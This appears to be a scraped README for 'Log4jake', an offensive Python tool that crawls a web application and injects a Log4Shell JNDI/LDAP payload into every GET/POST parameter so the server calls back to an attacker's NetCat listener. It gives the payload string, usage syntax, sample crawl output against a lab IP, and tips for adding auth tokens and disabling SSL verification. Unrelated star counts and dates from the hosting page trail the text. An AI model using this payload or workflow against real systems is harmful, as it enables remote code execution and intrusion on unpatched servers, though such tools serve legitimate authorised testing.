Log4jake
Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any discovered parameters with the ${jndi:ldap://:389} Log4j payload. Note that this tool is designed to work simultaneously with a NetCat listener.
If you want to test behind authentication, use the commented '#req.add_header('Authorization', "token_goes_here")' line to add the proper token. If you are experiencing SSL errors, use the commented '#context = ssl._create_unverified_context()' line in addition to 'resp = urllib.request.urlopen(req, context=context)'
Syntax:
└─$ python3 log4jake.py https://10.10.3.50
Remember to start NetCat Listener on port 389!!!
Enter IP address of your Listener: 10.10.3.4
Starting Web Spider
-------------------
SPIDERING -> https://10.10.3.50/
SPIDERING -> https://10.10.3.50/signup
POST /signup
SPIDERING -> https://10.10.3.50/login
POST /login_exec
SPIDERING -> https://10.10.3.50/clients
SPIDERING -> https://10.10.3.50/admin/website
SPIDERING -> https://10.10.3.50/cdn-cgi/l/email-protection#9ef4f1f0defdf8ffedf7eafbedb0fdf1f3
SPIDERING -> https://10.10.3.50/forgotpassword
POST /mailer5
9 Mar 05, 2022
12 Jan 07, 2023
66 Dec 08, 2022
2.7k Jan 09, 2023
1 Feb 12, 2022
60 Dec 10, 2022
25 Nov 09, 2022
5 Nov 23, 2021
213 Dec 30, 2022
52 Dec 17, 2022
10 Jul 28, 2022
9 Aug 31, 2022
396 Jan 08, 2023
84 Sep 09, 2022
1 Nov 07, 2021
162 Nov 25, 2022
1 Aug 29, 2022
35 Apr 17, 2022
24 Nov 29, 2022
8 Dec 03, 2021